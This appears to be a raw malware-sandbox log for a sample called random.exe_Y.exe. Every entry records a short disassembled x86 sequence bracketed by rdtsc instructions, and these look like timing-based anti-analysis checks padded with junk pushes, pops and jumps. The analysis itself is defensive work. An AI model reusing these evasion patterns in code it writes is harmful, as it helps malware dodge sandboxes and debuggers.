                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 39FDA2 second address: 39FDC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F3458756CB3h 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 39FDC1 second address: 39FDF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3458CA5146h 0x0000000a jnl 00007F3458CA5146h 0x00000010 popad 0x00000011 jmp 00007F3458CA514Bh 0x00000016 jmp 00007F3458CA514Ah 0x0000001b popad 0x0000001c push esi 0x0000001d jnp 00007F3458CA514Eh 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 39EF35 second address: 39EF44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jng 00007F3458756CACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 39F1FE second address: 39F20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F3458CA5146h 0x0000000f rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 39F79B second address: 39F7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 39F7A2 second address: 39F7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 39F7A8 second address: 39F7AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 39F7AD second address: 39F7B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F3458CA5146h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3A569F second address: 3A56BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3458756CB8h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 3A8F69 second address: 3A8F9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA5154h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F3458CA5150h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3458CA514Ah 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BB00C1 second address: 4BB0115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3458756CABh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F3458756CB6h 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3458756CB7h 0x0000001e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BB0115 second address: 4BB011B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA004F second address: 4BA005F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3458756CACh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA005F second address: 4BA0063 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA0063 second address: 4BA00A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3458756CAEh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F3458756CB0h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F3458756CB7h 0x0000001d rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA00A6 second address: 4BA00AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA00AC second address: 4BA00B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B701A6 second address: 4B70202 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007F3458CA514Eh 0x00000011 pushfd 0x00000012 jmp 00007F3458CA5152h 0x00000017 add eax, 35CBAC38h 0x0000001d jmp 00007F3458CA514Bh 0x00000022 popfd 0x00000023 popad 0x00000024 push dword ptr [ebp+04h] 0x00000027 pushad 0x00000028 push ecx 0x00000029 mov bh, 1Ch 0x0000002b pop esi 0x0000002c mov dx, 6780h 0x00000030 popad 0x00000031 push dword ptr [ebp+0Ch] 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 push ecx 0x00000038 pop ebx 0x00000039 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B90713 second address: 4B9074F instructions: 0x00000000 rdtsc 0x00000002 mov ah, 19h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F3458756CB8h 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3458756CB7h 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B9074F second address: 4B90775 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 mov ebx, 59B90ED6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007F3458CA514Dh 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov esi, edx 0x0000001a movsx edi, ax 0x0000001d popad 0x0000001e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B90411 second address: 4B90427 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov ch, 9Fh 0x0000000c mov esi, edi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B90427 second address: 4B9042B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B9042B second address: 4B9042F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B9042F second address: 4B90435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B90435 second address: 4B90465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3458756CB7h 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B90465 second address: 4B90489 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 call 00007F3458CA514Bh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov ecx, 0CAF95B7h 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B90489 second address: 4B9048D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B9048D second address: 4B90493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B90493 second address: 4B90499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA036D second address: 4BA0373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA0373 second address: 4BA0384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c mov di, 911Eh 0x00000010 popad 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BA0384 second address: 4BA03B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA5154h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F3458CA514Ch 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BE002A second address: 4BE0030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BE0030 second address: 4BE0034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BE0034 second address: 4BE0038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BE0038 second address: 4BE0070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3458CA514Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov eax, ebx 0x00000014 call 00007F3458CA5159h 0x00000019 pop ecx 0x0000001a popad 0x0000001b rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BE0070 second address: 4BE00B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 pushfd 0x00000007 jmp 00007F3458756CB9h 0x0000000c and ch, FFFFFFB6h 0x0000000f jmp 00007F3458756CB1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F3458756CADh 0x00000021 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BE00B9 second address: 4BE00BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BB0435 second address: 4BB0473 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c movsx edi, ax 0x0000000f mov si, AF6Fh 0x00000013 popad 0x00000014 pushad 0x00000015 mov dx, si 0x00000018 push eax 0x00000019 pop edx 0x0000001a popad 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 call 00007F3458756CB5h 0x00000025 pop eax 0x00000026 push edx 0x00000027 pop eax 0x00000028 popad 0x00000029 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BB0473 second address: 4BB0490 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3458CA5159h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BB0490 second address: 4BB0494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B905BC second address: 4B905C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B905C2 second address: 4B905C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B905C7 second address: 4B905DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, cl 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c mov eax, 3B1A9631h 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B905DF second address: 4B90661 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F3458756CB0h 0x00000010 xor ax, D468h 0x00000015 jmp 00007F3458756CABh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F3458756CB8h 0x00000021 sub cx, A6C8h 0x00000026 jmp 00007F3458756CABh 0x0000002b popfd 0x0000002c popad 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F3458756CB5h 0x00000037 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4B90661 second address: 4B906E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3458CA5157h 0x00000009 jmp 00007F3458CA5153h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F3458CA5158h 0x00000015 sbb ecx, 70E33DE8h 0x0000001b jmp 00007F3458CA514Bh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007F3458CA514Bh 0x0000002d call 00007F3458CA5158h 0x00000032 pop eax 0x00000033 popad 0x00000034 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BB0013 second address: 4BB0019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BB022F second address: 4BB0235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BB0235 second address: 4BB026E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F3458756CB9h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BB026E second address: 4BB0275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BB0275 second address: 4BB02B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F3458756CB0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3458756CB7h 0x00000018 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BB02B7 second address: 4BB02CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3458CA5154h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD06A9 second address: 4BD06AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD06AD second address: 4BD06B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD06B3 second address: 4BD06B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD06B9 second address: 4BD072F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F3458CA514Ah 0x0000000e push eax 0x0000000f jmp 00007F3458CA514Bh 0x00000014 xchg eax, ebp 0x00000015 jmp 00007F3458CA5156h 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d mov bl, al 0x0000001f pushfd 0x00000020 jmp 00007F3458CA5153h 0x00000025 xor si, E76Eh 0x0000002a jmp 00007F3458CA5159h 0x0000002f popfd 0x00000030 popad 0x00000031 xchg eax, ecx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD072F second address: 4BD0733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD0733 second address: 4BD0746 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD0746 second address: 4BD076A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD076A second address: 4BD076E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD076E second address: 4BD0772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD0772 second address: 4BD0778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD0778 second address: 4BD07A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458756CB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3458756CADh 0x00000011 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD07A1 second address: 4BD07CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA5151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [774365FCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3458CA514Dh 0x00000015 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD07CA second address: 4BD07D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD07D0 second address: 4BD07F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA5153h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD07F1 second address: 4BD07F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD07F5 second address: 4BD07F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD07F9 second address: 4BD07FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD07FF second address: 4BD083B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3458CA5158h 0x00000009 or cl, FFFFFFF8h 0x0000000c jmp 00007F3458CA514Bh 0x00000011 popfd 0x00000012 mov ah, 4Bh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007F34CB48827Dh 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD083B second address: 4BD083F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD083F second address: 4BD0845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD0845 second address: 4BD085B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3458756CB2h 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD085B second address: 4BD0882 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3458CA514Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3458CA5150h 0x00000016 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD0882 second address: 4BD0888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD0888 second address: 4BD088E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD088E second address: 4BD08E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F3458756CABh 0x00000012 xor ax, 5D2Eh 0x00000017 jmp 00007F3458756CB9h 0x0000001c popfd 0x0000001d movzx ecx, di 0x00000020 popad 0x00000021 and ecx, 1Fh 0x00000024 pushad 0x00000025 call 00007F3458756CB9h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD08E8 second address: 4BD0904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov edi, 40CB33A2h 0x0000000a popad 0x0000000b ror eax, cl 0x0000000d pushad 0x0000000e mov cx, bx 0x00000011 popad 0x00000012 leave 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ax, di 0x00000019 mov bl, 50h 0x0000001b popad 0x0000001c rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD0904 second address: 4BD0912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3458756CAAh 0x00000009 rdtsc
                            Source: C:\Users\user\Desktop\random.exe_Y.exeRDTSC instruction interceptor: First address: 4BD0912 second address: 4BD0916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
